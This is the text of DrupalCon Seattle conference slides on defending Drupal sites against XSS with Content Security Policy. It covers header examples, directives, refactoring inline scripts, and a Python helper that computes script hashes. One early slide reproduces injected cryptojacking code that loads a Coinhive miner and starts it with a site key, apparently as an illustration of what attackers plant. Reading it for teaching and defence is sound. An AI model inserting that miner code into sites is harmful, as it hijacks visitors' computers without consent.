Is your site really safe from XSS?

Bringing Content Security Policy to Drupal

Drupalcon Seattle

Geoff Appleby
https://gapple.github.io/presentation-csp-dc-seattle/
- 887th place

    <script src="https://cdn.example.com/script.js" async></script>

    /* [Warning] Do not copy or self host this file, you will not be supported */

window["document"]["write"]("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?rnd="+window["Math"]["random"]()+"'></script>");window["document"]["write"]('<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = {threads: 8,throttle:0.6}} var miner = new CoinHive.Anonymous(\'1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq\', cpuConfig);miner.start();</script>');
10 PM
Do you know where your data is?
Article about credit card theft via JavaScript malware
Drupal node creation page, with XSS attempt in the title field
Drupal XSS Security Advisory
Drupal administration page, with field for script to be added inline on every page
Web security is like an onion

It stinks?

Layers!
The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page.

Project page for the content security policy module

    Content-Security-Policy: default-src 'none';

    Content-Security-Policy: default-src 'self';

    Content-Security-Policy: default-src 'self'; style-src 'self' https://fonts.googleapis.com

    Content-Security-Policy:
      default-src 'self';
      style-src 'self' https://fonts.googleapis.com;
      font-src https://fonts.gstatic.com

    Content-Security-Policy:
      default-src https: 'unsafe-inline';
      report-uri https://example.test/report-uri/csp

    Content-Security-Policy-Report-Only:
      default-src 'self';
      report-uri https://example.test/report-uri/csp-ro
  • default-src
    • script-src
      • script-src-attr ③
      • script-src-elem ③
    • style-src
      • style-src-attr ③
      • style-src-elem ③
    • font-src
    • img-src
    • media-src
    • connect-src
  • frame-ancestors

③ Added in CSP Level 3
Drupal core issue for CKEditor 4 requiring unsafe-inline CSP policy

    Content-Security-Policy:
      script-src 'self' 'unsafe-inline' cdn.example.com;
      script-src-elem 'self' cdn.example.com;
      script-src-attr 'unsafe-inline'

    <script>
    (function(i,s,o,g,r,a,m){
      i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},
      a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://cdn.example.com/script.js','api');

    api('call');
    </script>
Replace with

    <script src="https://cdn.example.com/script.js" async></script>
    <script src="/api-call.js"></script>

    // Queue stub: calls made before script.js has loaded are buffered in api.q
    window.api=window.api||function(){(api.q=api.q||[]).push(arguments)};

    (function (drupalSettings) {
      api(drupalSettings.api.data);
    })(drupalSettings);
api-call.js
Googalytics Drupal module project page
"But I need this inline script"
But do you really?

    Content-Security-Policy: script-src 'self' 'sha256-blLDIhKaPEZDhc4WD45BC7pZxW4WBRp7E5Ne1wC/vdw='
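As an added example (not from the slides or the Content Security Policy module), a Python helper that finds each inline script on a page, computes its 'sha256-…' hash-source and builds the script-src value shown above; the sample page is constructed here. The digest must cover the script text byte-for-byte, so a template that adds a trailing newline produces a hash the browser will not match.

```python
import base64
import hashlib
from html.parser import HTMLParser

def csp_script_hash(source, algo="sha256"):
    """CSP hash-source for one inline script body: the digest covers the exact
    text between <script> and </script>, UTF-8 encoded, whitespace and newlines
    included, so a template that adds a trailing newline breaks the hash."""
    digest = hashlib.new(algo, source.encode("utf-8")).digest()
    return "'%s-%s'" % (algo, base64.b64encode(digest).decode("ascii"))

class _InlineScriptCollector(HTMLParser):
    """Collect the bodies of <script> elements that carry no src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._buf = None  # data chunks while inside an inline script, else None

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not any(name == "src" for name, _ in attrs):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def inline_script_bodies(html):
    parser = _InlineScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts

def script_src_directive(html, base_sources=("'self'",)):
    """script-src value that allows each of the page's inline scripts by hash."""
    hashes = [csp_script_hash(body) for body in inline_script_bodies(html)]
    return "script-src " + " ".join(list(base_sources) + hashes)

# Constructed sample page: one external script and one inline script.
SAMPLE_PAGE = ('<html><head><script src="https://cdn.example.com/script.js" '
               'async></script><script>api(\'call\');</script></head></html>')

if __name__ == "__main__":
    print("Content-Security-Policy: " + script_src_directive(SAMPLE_PAGE))
```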
							

More To Explore

  • Subresource Integrity (SRI)
  • Feature Policy
  • Reporting API
    • Network Error Logging
    • Deprecation & Intervention
  • Certificate Transparency & Expect-Staple
  • Certificate Authority Authorisation
Join contribution opportunities
Friday, April 12, 2019
gappleca